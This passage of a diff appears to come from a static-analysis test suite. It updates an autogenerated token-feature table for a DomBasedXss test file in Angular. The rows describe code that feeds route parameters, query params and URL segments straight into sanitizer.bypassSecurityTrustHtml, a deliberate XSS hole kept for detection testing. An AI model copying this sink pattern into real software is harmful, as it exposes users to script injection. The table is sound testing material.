this.ro ... 1].path | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | this.ro ... 1].path | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | this.ro ... 1].path | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12027,6 +91390,96 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | this.ro ... 1].path | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | this.ro ... 1].path | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:33:44:33:74 | this.ro ... 1].path | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:49:33:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:49:33:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:49:33:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:49:33:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:49:33:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:55:33:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:55:33:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:55:33:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:55:33:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:55:33:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:64:33:66 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:64:33:66 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:64:33:66 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:64:33:66 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:64:33:66 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:68:33:68 | 1 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:68:33:68 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:68:33:68 | 1 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:68:33:68 | 1 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:68:33:68 | 1 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:71:33:74 | path | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:71:33:74 | path | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:71:33:74 | path | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:71:33:74 | path | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:33:71:33:74 | path | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | exceptional return of this.sa ... ters.x) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | exceptional return of this.sa ... ters.x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | exceptional return of this.sa ... ters.x) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | exceptional return of this.sa ... ters.x) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | exceptional return of this.sa ... ters.x) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | this.sa ... ters.x) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | this.sa ... ters.x) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | this.sa ... ters.x) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | this.sa ... ters.x) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:5:34:83 | this.sa ... ters.x) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:10:34:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:10:34:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:10:34:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:10:34:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:10:34:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:20:34:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:20:34:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:20:34:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:20:34:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:20:34:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:66 | this.ro ... hot.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:66 | this.ro ... hot.url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:66 | this.ro ... hot.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:66 | this.ro ... hot.url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:66 | this.ro ... hot.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:69 | this.ro ... .url[1] | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:69 | this.ro ... .url[1] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:69 | this.ro ... .url[1] | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:69 | this.ro ... .url[1] | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:69 | this.ro ... .url[1] | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:80 | this.ro ... ameters | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:80 | this.ro ... ameters | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:80 | this.ro ... ameters | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:80 | this.ro ... ameters | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:80 | this.ro ... ameters | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12034,6 +91487,111 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:34:44:34:82 | this.ro ... eters.x | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x 